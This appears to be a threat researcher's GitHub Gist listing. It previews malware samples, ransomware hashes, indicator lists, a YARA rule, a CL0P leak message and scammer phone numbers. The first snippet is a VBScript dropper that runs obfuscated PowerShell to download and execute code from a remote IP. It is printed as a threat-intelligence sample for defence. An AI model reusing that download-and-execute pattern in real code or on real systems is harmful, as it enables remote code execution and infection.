This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script language="VBScript"> | |
| Function dl() | |
| Dim var_shell | |
| Set var_shell = CreateObject("Wscript.Shell") | |
| var_shell.run "powershell -c $s1='IE';$s2='X(New-Object Net.WebClie';$s3='nt).Downlo';$s4='adString(''hxxp://159.223.37[.]182/update'')';IEX ($s1+$s2+$s3+$s4)", 0, true | |
| End Function | |
| dl |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (function(_0x25cba2, _0x45eb40) { | |
| var a0_0x501b44 = { | |
| _0x17e23d: 0x38, | |
| _0x205270: 'CuXi', | |
| _0x4af451: 0x55, | |
| _0x3d4924: 0x44, | |
| _0x2c4ea4: 0x28, | |
| _0x561b2d: 'Sg20', | |
| _0x5656b1: 0x37, | |
| _0x3c1bf0: 'Urg4', |
BushidoUK
/ Message from CL0P Leaks
Created
August 15, 2022 19:31
A UK Water Utility was apparently hit by the CL0P group, this was the message on their .onion Tor site
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Website: | |
| www.thameswater.co.uk | |
| Revenue: | |
| $2 billion | |
| Thames Water supply much of critical water services to people and companies. | |
| This company is public and this mean not only they bring water and sewage services to millions of people they also allow many people and company to invest with their stock offering. | |
| Companies like this have much responsibility and we contact them and tell them that they have very bad holes in their systems. ALL SYSTEMS. | |
| We spent months in the company system and saw first hand evidence of very bad practice. |
BushidoUK
/ Tracking web defacements.txt
Created
November 26, 2022 13:35
Using Shodan and URLscan to track web defacements
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Hacked By ./EcchiExploit | |
| 2E4H - BHIOFF - Manusia Biasa Team | |
| BhiOfficial | |
| Banyumas Cyber Team | |
| sayahekwr@protonmail.com | |
| LulzGhost Team | |
| Manusia Biasa Team | |
| http.html:"EcchiExploit" |
BushidoUK
/ CN_Scammer_Numbers.txt
Last active
December 30, 2022 16:56
Chinese scammers targeting Chinese students in the UK
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| +44 7737 359848 Three | |
| +44 7521 967428 O2 | |
| +44 7415 787846 EE | |
| +44 7523 322875 O2 | |
| +44 7419 756102 EE | |
| +44 7575 186994 Three | |
| +44 7497 580997 EE | |
| +44 7544 631585 O2 | |
| +44 70 3401 7692 "Protected" / Unknown | |
| +353 (89) 499 6551 Liffey Telecom / Tesco Mobile |
BushidoUK
/ Royal_Ransomware_hashes_Dec_2022
Created
January 2, 2023 17:50
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1.exe | Netherlands | First seen : 2022-12-23 | |
| de025f921dd477c127fba971b9f90accfb58b117274ba1afb1aaf2222823b6ac | |
| qut.dll | Australia | First seen : 2022-12-23 | |
| 8e01ecf9d804454f34eeceb0f7793f4884be8868886a646526419fc2e2bbb648 | |
| gdr.exe | Argentina | First seen : 2022-12-21 | |
| bc06587b96b2628480d47579bcc2519a9da2b55aa037a49af4cd03811c534f66 | |
| windows_encryptor.exe | Hong Kong | First seen : 2022-12-18 |
BushidoUK
/ Ransomware Victims on Shodan
Created
March 27, 2023 23:12
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Loki | |
| https://www.shodan.io/search?query=%22Loki+Locker%22 | |
| BlackBit | |
| https://www.shodan.io/search?query=%22Encrypted+by+BlackBit%22 | |
| BlackHunt | |
| https://www.shodan.io/search?query=%22Your+Network+Infected+with+BlackHunt+Ransomware+Team%22 | |
| Amelia, Proxima |
BushidoUK
/ RaspberryRobin_C2Domains.yara
Created
May 3, 2023 00:51
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import "vt" | |
| rule RaspberryRobin_C2Domains{ | |
| meta: | |
| description = "Checks for Files with RaspberryRobin C2 domains" | |
| author = "Will Thomas (@BushidoToken), Equinix Threat Analysis Center (ETAC)" | |
| date = "2023-APRIL-14" | |
| tlp = "CLEAR" | |
| adversary = "DEV-0856" | |
| strings: |
BushidoUK
/ Malicious Hostnames.txt
Created
June 14, 2023 21:19
Malicious Hostnames belonging to Malware Operators, Ransomware Groups, and Advanced Persistence Threats
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| WIN-QQ80VPAFRNH | |
| 84.252.95.225 - SolarMarker | |
| 37.120.237.251 - SolarMarker | |
| 217.138.205.170 - Ursnif | |
| 185.236.202.184 - Pegasus, NSO Group | |
| DESKTOP-2NFCDE2 | |
| 94.142.138.32 - Aurora Stealer | |
| 45.15.156.250 - Aurora Stealer | |
| 45.15.156.40 - Raccoon Stealer |
BushidoUK
/ BYOVA Collection.txt
Created
June 17, 2023 17:24
Collection of Vulnerable Legit Applications used for DLL side-loading or search-order hijacking
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Valid signed file by Symantec, Symantec Antivirus Installer | |
| 61d1943f0b702f4c16bb37228ade1d8f0ef4675b480921950d026c82e4a65fde | |
| Valid signed file by Venta Association, VentaFax MAPI client | |
| 390d75e6c7fc1cf258145dc712c1fac1eb183efccee1b03c058cec1d790e46b1 | |
| Valid signed file by Vivaldi Technologies, Vivaldi.exe | |
| 58e7af5eb1acb5c9bee821d59054c69263aed3dce1b95616255dea7114ad8494 | |
| Valid signed file by Invincea, Inc. Sandboxie |
OlderNewer